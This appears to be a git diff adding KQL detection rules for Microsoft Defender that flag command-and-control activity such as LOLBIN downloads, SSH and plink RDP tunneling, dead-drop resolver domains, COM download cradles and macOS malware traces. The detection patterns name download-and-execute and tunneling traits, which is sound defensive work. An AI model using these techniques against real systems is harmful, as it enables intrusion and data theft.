@@ +// Title: Network Connection Initiated By IMEWDBLD.EXE +// Author: frack113 +// Date: 2022-01-22 +// Level: high +// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql new file mode 100644 index 00000000..1a8a3a05 --- /dev/null +++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql @@ -0,0 +1,11 @@ +// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql new file mode 100644 index 00000000..008d3ad0 --- /dev/null +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql @@ -0,0 +1,11 @@ +// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 + +DeviceNetworkEvents +| where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql new file mode 100644 index 00000000..60068ecd --- /dev/null +++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql @@ -0,0 +1,15 @@ +// Title: New Connection Initiated To Potential Dead Drop Resolver Domain +// Author: Sorina Ionescu, X__Junior (Nextron Systems) +// Date: 2022-08-17 +// Level: high +// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. +In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 +// False Positives: +// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. +// - Ninite contacting githubusercontent.com + +DeviceNetworkEvents +| where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith "GoogleDriveFS.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql new file mode 100644 index 00000000..06f4adac --- /dev/null +++ b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql @@ -0,0 +1,12 @@ +// Title: Outbound Network Connection Initiated By Script Interpreter +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-28 +// Level: high +// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate scripts + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql new file mode 100644 index 00000000..a99fec95 --- /dev/null +++ b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql @@ -0,0 +1,12 @@ +// Title: Port Forwarding Activity Via SSH.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-12 +// Level: medium +// Description: Detects port forwarding activity via SSH.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004 +// False Positives: +// - Administrative activity using a remote port forwarding to a local port + +DeviceProcessEvents +| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql new file mode 100644 index 00000000..d7aeff45 --- /dev/null +++ b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql @@ -0,0 +1,12 @@ +// Title: Potential Amazon SSM Agent Hijacking +// Author: Muhammad Faisal +// Date: 2023-08-02 +// Level: medium +// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 +// False Positives: +// - Legitimate activity of system administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql new file mode 100644 index 00000000..e4aa4b71 --- /dev/null +++ b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql @@ -0,0 +1,12 @@ +// Title: Potential COM Objects Download Cradles Usage - Process Creation +// Author: frack113 +// Date: 2022-12-25 +// Level: medium +// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of the library + +DeviceProcessEvents +| where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql new file mode 100644 index 00000000..a0a9fa10 --- /dev/null +++ b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest +// Author: Florian Roth (Nextron Systems), Hieu Tran +// Date: 2023-03-13 +// Level: medium +// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql new file mode 100644 index 00000000..90364892 --- /dev/null +++ b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql @@ -0,0 +1,10 @@ +// Title: Potential Download/Upload Activity Using Type Command +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-14 +// Level: medium +// Description: Detects usage of the "type" command to download/upload data from WebDAV server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql new file mode 100644 index 00000000..18429419 --- /dev/null +++ b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql @@ -0,0 +1,10 @@ +// Title: Potential In-Memory Download And Compile Of Payloads +// Author: Sohan G (D4rkCiph3r), Red Canary (idea) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql new file mode 100644 index 00000000..326945dc --- /dev/null +++ b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql @@ -0,0 +1,12 @@ +// Title: Potential Linux Amazon SSM Agent Hijacking +// Author: Muhammad Faisal +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 +// False Positives: +// - Legitimate activity of system administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql new file mode 100644 index 00000000..bf7e4e9f --- /dev/null +++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql @@ -0,0 +1,10 @@ +// Title: Potential RDP Tunneling Via Plink +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-04 +// Level: high +// Description: Execution of plink to perform data exfiltration and tunneling +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 + +DeviceProcessEvents +| where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql new file mode 100644 index 00000000..df83627f --- /dev/null +++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql @@ -0,0 +1,10 @@ +// Title: Potential RDP Tunneling Via SSH +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-12 +// Level: high +// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 + +DeviceProcessEvents +| where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql new file mode 100644 index 00000000..346ab1f1 --- /dev/null +++ b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql @@ -0,0 +1,10 @@ +// Title: Potential WizardUpdate Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: high +// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents +| where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql new file mode 100644 index 00000000..a84e9188 --- /dev/null +++ b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql @@ -0,0 +1,10 @@ +// Title: Potential XCSSET Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents +| where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group 